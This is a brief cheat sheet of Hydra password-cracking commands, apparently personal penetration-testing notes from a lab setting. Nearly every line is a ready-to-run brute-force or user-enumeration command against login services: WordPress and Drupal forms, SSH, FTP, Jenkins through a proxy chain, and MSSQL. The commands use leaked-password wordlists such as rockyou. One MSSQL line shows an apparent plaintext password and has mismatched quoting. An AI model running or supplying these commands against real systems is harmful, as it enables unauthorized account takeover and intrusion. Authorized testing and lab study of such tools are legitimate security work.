# hydra
https://github.com/gnebbia/hydra_notes/blob/master/README.md
---
To check requests with proxy: export HYDRA_PROXY=connect://127.0.0.1:8080
---

* Wordpress bruteform on port 65000 with known username
`hydra 10.10.110.100 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:is incorrect." -l james -P /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -s 65000`
**watchout for empty lines in wordlist -> rockyou.txt**

- SSH bruteforce with 4 thread
`hydra -l james 10.10.110.100 -P /opt/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh -t 4`
---

- FTP
`hydra -V -L users -P pass ftp://172.16.1.12`
`hydra -C /opt/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://$IP`


- jenkins
`proxychains4 -q hydra -V -s 8080 172.16.1.19 http-form-post “/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password” -L user.txt -P pass -t 10 -w 30`

- mssql
`hydra -l 'sophie' -P ''TerrorInflictPurpleDirt996655" mssql://172.16.1.5 -V`

- drupal user enumeration
`hydra 10.129.214.154 http-post-form "/user/password:name=^USER^&form_build_id=form-q2OtblVzGPwpntpRLcpH0irZhuK72SVAinIVwJjNAWU&form_id=user_pass&op=E-mail+new+password:is not recognized" -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -e 'n'`
